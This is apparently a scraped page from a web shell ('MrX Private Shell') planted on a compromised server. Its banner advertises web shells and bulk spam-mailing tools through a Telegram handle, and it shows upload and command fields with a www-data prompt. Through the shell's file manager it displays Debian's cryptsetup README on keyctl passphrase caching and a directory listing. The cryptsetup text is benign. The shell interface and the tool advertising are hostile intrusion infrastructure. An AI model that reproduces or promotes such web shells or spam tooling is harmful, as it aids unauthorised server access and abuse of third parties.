__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
decrypt_keyctl
==============

A passphrase caching script to be used in `/etc/crypttab` on Debian and Ubuntu.
When there are multiple cryptsetup (either plain or LUKS) volumes with the same
passphrase, it is an unnecessary task to input the passphrase more than once.

Just add this script as keyscript to your `/etc/crypttab` and it will cache the
passphrase of all crypttab entries with the same identifier.

Either copy decrypt_keyctl into the default search path for keyscripts from
cryptsetup /lib/cryptdisks/scripts/. So you can just write
`keyscript=decrypt_keyctl` in `/etc/crypttab`, or use a random path of your
choice and give the full path e.g `keyscript=/sbin/decrypt_keyctl`.


Requirements
------------

* Debian cryptsetup package with `/etc/crypttab` handling and keyscript option
  * Tested with Debian Lenny, Squeeze and Sid
* Installed and working keyutils package (`keyctl`)
  * Needs `CONFIG_KEYS=y` in your kernel configuration

What For?
---------

In old (pre 2.6.38) kernels, dm-crypt used to be single threaded. Thus every
dm-crypt mapping only used a single core for crypto operations. To use the full
power of your many-core processor it is was necessary to split the dm-crypt
device. For Linux software raid arrays the easiest segmentation was to just put
the dm-crypt layer below the software raid layer.

But with a 5 disk raid5 it is a rather daunting task to input the passphrase
five times. This is what this keyscripts solve for you.

Usage
-----

Best shown by example:

* 5 disks
* Linux software raid5

Layer:

      sda             sdb            sdc ... sde
    +-----------+   +-----------+
    | LUKS      |   | LUKS      |
    | +-------+ |   | +-------+ |
    | | RAID5 | |   | | RAID5 | |
    | | ...   | |   | | ...   | |

Crypttab Entries:

    <target>    <source>    <keyfile>        <options>
    sda_crypt   /dev/sda2   main_data_raid   luks,discard,keyscript=decrypt_keyctl
    sdb_crypt   /dev/sdb2   main_data_raid   luks,discard,keyscript=decrypt_keyctl
    ...
    sde_crypt   /dev/sde2   main_data_raid   luks,discard,keyscript=decrypt_keyctl


How does it work
----------------

Crypttab Interface:

A keyscript is added to options including a keyfile definition as third
parameter in the crypttab file. The keyscript is called with the keyfile as the
first and only parameter. Additionally there are a few environment variables
set but currently are not used by this keyscript (man 5 crypttab for exact
description).

Keyscript:

`decrypt_keyctl` uses the Linux kernel keyring facility to securely cache
passphrases between multiple invocations.
The keyfile parameter from crypttab is used to find the same passphrase
between multiple invocations.  The term used to described the key in the user
keyring is `cryptsetup:$CRYPTTAB_KEY`, unless `$CRYPTTAB_KEY` is empty
or has the special value `none`, in which case the description is merely
`cryptsetup` (thus allowing compatibility with other tools like gdm and
systemd-ask-password(1).)

Currently the cache timeout is 60 seconds and not configurable (please report a
bug if it is too low for you).


Problems
--------

Passphrase is piped between processes and could end up in unsecured memory,
thus later swapped to disk! => Use of cryptoswap recommend!


Hints
-----

To remove all traces of this keyscript you may want to cleanup the keyring
completely with the following command afterwards:

    sudo keyctl clear @u

 -- Jonas Meurer <jonas@freesources.org>  Mon, 27 Sep 2010 14:01:35 +0000

 -- Guilhem Moulin <guilhem@debian.org>  Tue, 25 Dec 2018 01:12:24 +0100

Filemanager

Name Type Size Permission Actions
examples Folder 0755
AUTHORS File 137 B 0644
FAQ.md.gz File 49.58 KB 0644
Keyring.txt File 3.81 KB 0644
LUKS2-locking.txt File 3.87 KB 0644
NEWS.Debian.gz File 660 B 0644
README.Debian.gz File 5.61 KB 0644
README.debug File 2.67 KB 0644
README.gnupg File 1.8 KB 0644
README.gnupg-sc File 2.3 KB 0644
README.keyctl File 3.5 KB 0644
README.md.gz File 2.45 KB 0644
README.opensc.gz File 2.17 KB 0644
changelog.Debian.gz File 16.67 KB 0644
copyright File 11.11 KB 0644
v1.0.7-ReleaseNotes File 2.85 KB 0644
v1.1.0-ReleaseNotes.gz File 2.22 KB 0644
v1.1.1-ReleaseNotes File 1.75 KB 0644
v1.1.2-ReleaseNotes File 1.56 KB 0644
v1.1.3-ReleaseNotes File 482 B 0644
v1.2.0-ReleaseNotes.gz File 2.08 KB 0644
v1.3.0-ReleaseNotes.gz File 2.08 KB 0644
v1.3.1-ReleaseNotes File 421 B 0644
v1.4.0-ReleaseNotes.gz File 2.2 KB 0644
v1.4.1-ReleaseNotes File 889 B 0644
v1.4.2-ReleaseNotes File 1.6 KB 0644
v1.4.3-ReleaseNotes File 2.31 KB 0644
v1.5.0-ReleaseNotes.gz File 3.24 KB 0644
v1.5.1-ReleaseNotes File 1.26 KB 0644
v1.6.0-ReleaseNotes.gz File 3.73 KB 0644
v1.6.1-ReleaseNotes File 1.02 KB 0644
v1.6.2-ReleaseNotes File 989 B 0644
v1.6.3-ReleaseNotes File 1.82 KB 0644
v1.6.4-ReleaseNotes File 1.99 KB 0644
v1.6.5-ReleaseNotes File 2.42 KB 0644
v1.6.6-ReleaseNotes File 1.07 KB 0644
v1.6.7-ReleaseNotes File 3.26 KB 0644
v1.6.8-ReleaseNotes File 2.02 KB 0644
v1.7.0-ReleaseNotes File 3.03 KB 0644
v1.7.1-ReleaseNotes File 1.34 KB 0644
v1.7.2-ReleaseNotes File 1.45 KB 0644
v1.7.3-ReleaseNotes File 811 B 0644
v1.7.4-ReleaseNotes File 661 B 0644
v1.7.5-ReleaseNotes File 833 B 0644
v2.0.0-ReleaseNotes.gz File 9.5 KB 0644
v2.0.1-ReleaseNotes.gz File 2.17 KB 0644
v2.0.2-ReleaseNotes.gz File 1.95 KB 0644
v2.0.3-ReleaseNotes.gz File 2.39 KB 0644
v2.0.4-ReleaseNotes.gz File 2.27 KB 0644
v2.0.5-ReleaseNotes.gz File 2.02 KB 0644
v2.0.6-ReleaseNotes.gz File 1.91 KB 0644
v2.1.0-ReleaseNotes.gz File 3.41 KB 0644
v2.2.0-ReleaseNotes.gz File 4.47 KB 0644
v2.2.1-ReleaseNotes File 1.38 KB 0644
v2.2.2-ReleaseNotes File 2.1 KB 0644
v2.3.0-ReleaseNotes.gz File 3.18 KB 0644
v2.3.1-ReleaseNotes File 1.73 KB 0644
v2.3.2-ReleaseNotes File 1.47 KB 0644
v2.3.3-ReleaseNotes File 1.36 KB 0644
v2.3.4-ReleaseNotes.gz File 1.95 KB 0644
v2.3.5-ReleaseNotes.gz File 3.06 KB 0644
v2.3.6-ReleaseNotes File 2.26 KB 0644
v2.4.0-ReleaseNotes.gz File 4.65 KB 0644
v2.4.1-ReleaseNotes File 1.9 KB 0644
v2.4.2-ReleaseNotes File 1.34 KB 0644
v2.4.3-ReleaseNotes.gz File 1.95 KB 0644
v2.5.0-ReleaseNotes.gz File 4.35 KB 0644
v2.6.0-ReleaseNotes.gz File 3.62 KB 0644
v2.6.1-ReleaseNotes File 2.06 KB 0644
v2.7.0-ReleaseNotes.gz File 6.5 KB 0644
Filemanager